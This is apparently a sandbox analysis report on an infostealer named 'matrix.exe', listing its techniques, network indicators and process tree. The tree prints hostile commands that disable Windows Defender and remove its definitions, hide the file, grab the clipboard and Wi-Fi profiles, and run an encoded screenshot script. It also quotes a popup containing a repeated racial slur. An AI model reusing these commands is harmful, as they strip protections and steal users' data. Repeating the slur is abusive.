ec1fed84d75353891b36fb78fd8f36439b42d8c2cbb0c71095ea16fc677a1f1d

Analysis

max time kernel
112s
max time network
116s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/08/2024, 20:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

matrix.exe
Size

7.4MB
MD5

168cdc3d6000643f42df39498a725211
SHA1

8e66a27674f7aae4b532c57c4c05b5b91718e159
SHA256

ec1fed84d75353891b36fb78fd8f36439b42d8c2cbb0c71095ea16fc677a1f1d
SHA512

774109e8c6a216eaea439cca637ade9c289416a4a4f4d62c54f66ecf4ad41b7e8b4019612cb905894ad8b80282b67ab540ed98ca4ed6a8fd3f23b631f36b2cc8
SSDEEP

98304:LQSi8x9XQskurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EAKhOC112c:LXP9VkurErvI9pWjgfPvzm6gsFE14A/

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5128	powershell.exe
3300	powershell.exe
2688	powershell.exe
1308	powershell.exe
4048	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	matrix.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2056	cmd.exe
3580	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4872	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe
1084	matrix.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002361f-21.dat	upx
behavioral2/memory/1084-25-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx
behavioral2/files/0x0007000000023612-27.dat	upx
behavioral2/files/0x000700000002361d-29.dat	upx
behavioral2/files/0x0007000000023619-47.dat	upx
behavioral2/files/0x0007000000023618-46.dat	upx
behavioral2/memory/1084-48-0x00007FFC04970000-0x00007FFC0497F000-memory.dmp	upx
behavioral2/files/0x0007000000023617-45.dat	upx
behavioral2/files/0x0007000000023616-44.dat	upx
behavioral2/files/0x0007000000023615-43.dat	upx
behavioral2/files/0x0007000000023614-42.dat	upx
behavioral2/files/0x0007000000023613-41.dat	upx
behavioral2/files/0x0007000000023611-40.dat	upx
behavioral2/files/0x0007000000023624-39.dat	upx
behavioral2/files/0x0007000000023623-38.dat	upx
behavioral2/files/0x0007000000023622-37.dat	upx
behavioral2/files/0x000700000002361e-34.dat	upx
behavioral2/files/0x000700000002361c-33.dat	upx
behavioral2/memory/1084-30-0x00007FFBFEFD0000-0x00007FFBFEFF4000-memory.dmp	upx
behavioral2/memory/1084-54-0x00007FFBFE870000-0x00007FFBFE89D000-memory.dmp	upx
behavioral2/memory/1084-56-0x00007FFBFDEE0000-0x00007FFBFDEF9000-memory.dmp	upx
behavioral2/memory/1084-59-0x00007FFBEE280000-0x00007FFBEE2A3000-memory.dmp	upx
behavioral2/memory/1084-60-0x00007FFBEE030000-0x00007FFBEE1AE000-memory.dmp	upx
behavioral2/memory/1084-64-0x00007FFBFF6C0000-0x00007FFBFF6CD000-memory.dmp	upx
behavioral2/memory/1084-63-0x00007FFBFDEC0000-0x00007FFBFDED9000-memory.dmp	upx
behavioral2/memory/1084-66-0x00007FFBEDFB0000-0x00007FFBEDFE3000-memory.dmp	upx
behavioral2/memory/1084-71-0x00007FFBEDA80000-0x00007FFBEDFA9000-memory.dmp	upx
behavioral2/memory/1084-70-0x00007FFBEEA60000-0x00007FFBEEB2D000-memory.dmp	upx
behavioral2/memory/1084-78-0x00007FFBEE940000-0x00007FFBEEA5C000-memory.dmp	upx
behavioral2/memory/1084-77-0x00007FFBFECD0000-0x00007FFBFECDD000-memory.dmp	upx
behavioral2/memory/1084-76-0x00007FFBFF7F0000-0x00007FFBFF804000-memory.dmp	upx
behavioral2/memory/1084-104-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx
behavioral2/memory/1084-108-0x00007FFBFEFD0000-0x00007FFBFEFF4000-memory.dmp	upx
behavioral2/memory/1084-120-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx
behavioral2/memory/1084-131-0x00007FFBEDA80000-0x00007FFBEDFA9000-memory.dmp	upx
behavioral2/memory/1084-130-0x00007FFBEEA60000-0x00007FFBEEB2D000-memory.dmp	upx
behavioral2/memory/1084-129-0x00007FFBEDFB0000-0x00007FFBEDFE3000-memory.dmp	upx
behavioral2/memory/1084-127-0x00007FFBFDEC0000-0x00007FFBFDED9000-memory.dmp	upx
behavioral2/memory/1084-126-0x00007FFBEE030000-0x00007FFBEE1AE000-memory.dmp	upx
behavioral2/memory/1084-125-0x00007FFBEE280000-0x00007FFBEE2A3000-memory.dmp	upx
behavioral2/memory/1084-123-0x00007FFBFE870000-0x00007FFBFE89D000-memory.dmp	upx
behavioral2/memory/1084-323-0x00007FFBEE030000-0x00007FFBEE1AE000-memory.dmp	upx
behavioral2/memory/1084-344-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx
behavioral2/memory/1084-355-0x00007FFBEDA80000-0x00007FFBEDFA9000-memory.dmp	upx
behavioral2/memory/1084-354-0x00007FFBEEA60000-0x00007FFBEEB2D000-memory.dmp	upx
behavioral2/memory/1084-353-0x00007FFBEDFB0000-0x00007FFBEDFE3000-memory.dmp	upx
behavioral2/memory/1084-345-0x00007FFBFEFD0000-0x00007FFBFEFF4000-memory.dmp	upx
behavioral2/memory/1084-360-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx
behavioral2/memory/1084-393-0x00007FFBFE870000-0x00007FFBFE89D000-memory.dmp	upx
behavioral2/memory/1084-392-0x00007FFC04970000-0x00007FFC0497F000-memory.dmp	upx
behavioral2/memory/1084-411-0x00007FFBEEA60000-0x00007FFBEEB2D000-memory.dmp	upx
behavioral2/memory/1084-415-0x00007FFBEE940000-0x00007FFBEEA5C000-memory.dmp	upx
behavioral2/memory/1084-414-0x00007FFBFECD0000-0x00007FFBFECDD000-memory.dmp	upx
behavioral2/memory/1084-413-0x00007FFBFF7F0000-0x00007FFBFF804000-memory.dmp	upx
behavioral2/memory/1084-412-0x00007FFBEDA80000-0x00007FFBEDFA9000-memory.dmp	upx
behavioral2/memory/1084-410-0x00007FFBEDFB0000-0x00007FFBEDFE3000-memory.dmp	upx
behavioral2/memory/1084-409-0x00007FFBFF6C0000-0x00007FFBFF6CD000-memory.dmp	upx
behavioral2/memory/1084-408-0x00007FFBFDEC0000-0x00007FFBFDED9000-memory.dmp	upx
behavioral2/memory/1084-407-0x00007FFBEE030000-0x00007FFBEE1AE000-memory.dmp	upx
behavioral2/memory/1084-406-0x00007FFBEE280000-0x00007FFBEE2A3000-memory.dmp	upx
behavioral2/memory/1084-405-0x00007FFBFDEE0000-0x00007FFBFDEF9000-memory.dmp	upx
behavioral2/memory/1084-391-0x00007FFBFEFD0000-0x00007FFBFEFF4000-memory.dmp	upx
behavioral2/memory/1084-390-0x00007FFBEEE40000-0x00007FFBEF432000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	discord.com
40	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3180	tasklist.exe
3064	tasklist.exe
4364	tasklist.exe
2424	tasklist.exe
704	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
812	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4900	cmd.exe
4680	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1756	cmd.exe
5528	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3344	WMIC.exe
4468	WMIC.exe
1116	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5516	systeminfo.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
5588	taskkill.exe
60	taskkill.exe
2860	taskkill.exe
3784	taskkill.exe
6060	taskkill.exe
5132	taskkill.exe
3132	taskkill.exe
5820	taskkill.exe
5500	taskkill.exe
5488	taskkill.exe
1096	taskkill.exe
5160	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4680	PING.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1308	powershell.exe
1308	powershell.exe
3300	powershell.exe
3300	powershell.exe
3300	powershell.exe
1308	powershell.exe
4048	powershell.exe
4048	powershell.exe
4048	powershell.exe
3580	powershell.exe
3580	powershell.exe
5508	powershell.exe
5508	powershell.exe
5508	powershell.exe
3580	powershell.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
5844	powershell.exe
5844	powershell.exe
5844	powershell.exe
5128	powershell.exe
5128	powershell.exe
5128	powershell.exe
5216	powershell.exe
5216	powershell.exe
5216	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeDebugPrivilege	4364	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4468	WMIC.exe
Token: SeSecurityPrivilege	4468	WMIC.exe
Token: SeTakeOwnershipPrivilege	4468	WMIC.exe
Token: SeLoadDriverPrivilege	4468	WMIC.exe
Token: SeSystemProfilePrivilege	4468	WMIC.exe
Token: SeSystemtimePrivilege	4468	WMIC.exe
Token: SeProfSingleProcessPrivilege	4468	WMIC.exe
Token: SeIncBasePriorityPrivilege	4468	WMIC.exe
Token: SeCreatePagefilePrivilege	4468	WMIC.exe
Token: SeBackupPrivilege	4468	WMIC.exe
Token: SeRestorePrivilege	4468	WMIC.exe
Token: SeShutdownPrivilege	4468	WMIC.exe
Token: SeDebugPrivilege	4468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4468	WMIC.exe
Token: SeRemoteShutdownPrivilege	4468	WMIC.exe
Token: SeUndockPrivilege	4468	WMIC.exe
Token: SeManageVolumePrivilege	4468	WMIC.exe
Token: 33	4468	WMIC.exe
Token: 34	4468	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2840 wrote to memory of 1084	2840	matrix.exe	91
PID 2840 wrote to memory of 1084	2840	matrix.exe	91
PID 1084 wrote to memory of 692	1084	matrix.exe	96
PID 1084 wrote to memory of 692	1084	matrix.exe	96
PID 1084 wrote to memory of 1496	1084	matrix.exe	97
PID 1084 wrote to memory of 1496	1084	matrix.exe	97
PID 1084 wrote to memory of 2424	1084	matrix.exe	98
PID 1084 wrote to memory of 2424	1084	matrix.exe	98
PID 1084 wrote to memory of 2284	1084	matrix.exe	102
PID 1084 wrote to memory of 2284	1084	matrix.exe	102
PID 1084 wrote to memory of 5040	1084	matrix.exe	104
PID 1084 wrote to memory of 5040	1084	matrix.exe	104
PID 1496 wrote to memory of 3300	1496	cmd.exe	106
PID 1496 wrote to memory of 3300	1496	cmd.exe	106
PID 692 wrote to memory of 1308	692	cmd.exe	107
PID 692 wrote to memory of 1308	692	cmd.exe	107
PID 2424 wrote to memory of 3652	2424	cmd.exe	108
PID 2424 wrote to memory of 3652	2424	cmd.exe	108
PID 2284 wrote to memory of 4364	2284	cmd.exe	109
PID 2284 wrote to memory of 4364	2284	cmd.exe	109
PID 5040 wrote to memory of 2860	5040	cmd.exe	110
PID 5040 wrote to memory of 2860	5040	cmd.exe	110
PID 1084 wrote to memory of 4616	1084	matrix.exe	116
PID 1084 wrote to memory of 4616	1084	matrix.exe	116
PID 4616 wrote to memory of 4056	4616	cmd.exe	118
PID 4616 wrote to memory of 4056	4616	cmd.exe	118
PID 1084 wrote to memory of 3024	1084	matrix.exe	119
PID 1084 wrote to memory of 3024	1084	matrix.exe	119
PID 3024 wrote to memory of 4840	3024	cmd.exe	121
PID 3024 wrote to memory of 4840	3024	cmd.exe	121
PID 1084 wrote to memory of 2344	1084	matrix.exe	122
PID 1084 wrote to memory of 2344	1084	matrix.exe	122
PID 2344 wrote to memory of 4468	2344	cmd.exe	124
PID 2344 wrote to memory of 4468	2344	cmd.exe	124
PID 1084 wrote to memory of 3700	1084	matrix.exe	125
PID 1084 wrote to memory of 3700	1084	matrix.exe	125
PID 3700 wrote to memory of 1116	3700	cmd.exe	127
PID 3700 wrote to memory of 1116	3700	cmd.exe	127
PID 1084 wrote to memory of 812	1084	matrix.exe	128
PID 1084 wrote to memory of 812	1084	matrix.exe	128
PID 1084 wrote to memory of 2392	1084	matrix.exe	130
PID 1084 wrote to memory of 2392	1084	matrix.exe	130
PID 2392 wrote to memory of 4048	2392	cmd.exe	133
PID 2392 wrote to memory of 4048	2392	cmd.exe	133
PID 812 wrote to memory of 4288	812	cmd.exe	132
PID 812 wrote to memory of 4288	812	cmd.exe	132
PID 1084 wrote to memory of 4056	1084	matrix.exe	135
PID 1084 wrote to memory of 4056	1084	matrix.exe	135
PID 1084 wrote to memory of 1480	1084	matrix.exe	136
PID 1084 wrote to memory of 1480	1084	matrix.exe	136
PID 4056 wrote to memory of 2424	4056	cmd.exe	139
PID 4056 wrote to memory of 2424	4056	cmd.exe	139
PID 1480 wrote to memory of 704	1480	cmd.exe	140
PID 1480 wrote to memory of 704	1480	cmd.exe	140
PID 1084 wrote to memory of 4872	1084	matrix.exe	141
PID 1084 wrote to memory of 4872	1084	matrix.exe	141
PID 1084 wrote to memory of 2056	1084	matrix.exe	142
PID 1084 wrote to memory of 2056	1084	matrix.exe	142
PID 1084 wrote to memory of 2952	1084	matrix.exe	145
PID 1084 wrote to memory of 2952	1084	matrix.exe	145
PID 1084 wrote to memory of 1588	1084	matrix.exe	147
PID 1084 wrote to memory of 1588	1084	matrix.exe	147
PID 2952 wrote to memory of 3180	2952	cmd.exe	149
PID 2952 wrote to memory of 3180	2952	cmd.exe	149

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4288	attrib.exe
5812	attrib.exe
5988	attrib.exe

C:\Users\Admin\AppData\Local\Temp\matrix.exe
"C:\Users\Admin\AppData\Local\Temp\matrix.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Users\Admin\AppData\Local\Temp\matrix.exe
  "C:\Users\Admin\AppData\Local\Temp\matrix.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matrix.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matrix.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger ', 0, 'ratted by @slur and @balenci', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2424
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger get ratted nigger ', 0, 'ratted by @slur and @balenci', 0+16);close()"
      4⤵
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matrix.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:812
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matrix.exe"
      4⤵
      Views/modifies file attributes
      PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1480
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4872
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1588
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1756
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3544
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3808
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAI